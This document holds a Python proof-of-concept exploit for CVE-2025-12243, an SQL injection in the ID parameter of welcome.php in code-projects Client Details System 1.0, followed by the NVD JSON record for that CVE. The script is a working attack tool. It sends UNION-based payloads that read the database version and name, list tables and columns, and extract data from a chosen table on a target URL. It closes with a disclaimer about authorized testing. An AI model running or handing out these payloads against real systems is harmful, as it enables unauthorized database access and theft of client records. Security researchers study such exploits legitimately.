CVE-2025-12243

import requests import sys # CVE-2025-12243 SQL Injection PoC # Target: code-projects Client Details System 1.0 # Component: clientdetails/welcome.php # Parameter: ID (GET) def exploit_sqli(url, payload): """ Exploit SQL injection vulnerability in welcome.php """ target_url = f"{url}/clientdetails/welcome.php" params = {'ID': payload} try: response = requests.get(target_url, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def get_db_version(url): """ Extract database version using UNION-based injection """ payload = "1' UNION SELECT NULL,version(),NULL,NULL,NULL---" result = exploit_sqli(url, payload) if result and 'version' in result.lower(): print("[+] Database version extracted successfully") return result def get_db_name(url): """ Extract current database name """ payload = "1' UNION SELECT NULL,database(),NULL,NULL,NULL---" return exploit_sqli(url, payload) def get_tables(url): """ Extract table names from information_schema """ payload = "1' UNION SELECT NULL,group_concat(table_name),NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()---" return exploit_sqli(url, payload) def get_columns(url, table_name): """ Extract column names from specified table """ payload = f"1' UNION SELECT NULL,group_concat(column_name),NULL,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'---" return exploit_sqli(url, payload) def extract_data(url, table_name, columns): """ Extract sensitive data from target table """ cols = ','.join(columns) payload = f"1' UNION SELECT NULL,group_concat({cols}),NULL,NULL,NULL FROM {table_name}---" return exploit_sqli(url, payload) def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-12243.py <target_url>") print("Example: python cve-2025-12243.py http://localhost/client-details-system") sys.exit(1) base_url = sys.argv[1].rstrip('/') print("[*] Starting CVE-2025-12243 SQL Injection Exploitation") print(f"[*] Target: {base_url}") # Step 1: Detect vulnerability print("\n[1] Detecting SQL injection vulnerability...") test_payload = "1' AND 1=1---" exploit_sqli(base_url, test_payload) # Step 2: Enumerate database information print("\n[2] Extracting database information...") get_db_version(base_url) get_db_name(base_url) # Step 3: Enumerate tables print("\n[3] Enumerating database tables...") get_tables(base_url) print("\n[!] Manual verification required for data extraction") print("[!] This PoC is for educational and authorized testing purposes only") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12243", "sourceIdentifier": "[email protected]", "published": "2025-10-27T07:15:40.237", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the file clientdetails/welcome.php of the component GET Parameter Handler. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:client_details_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BF8DA67D-864D-46F0-A564-02427490562A"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/hellonewbie/tutorial/issues/6", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329914", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329914", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673773", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}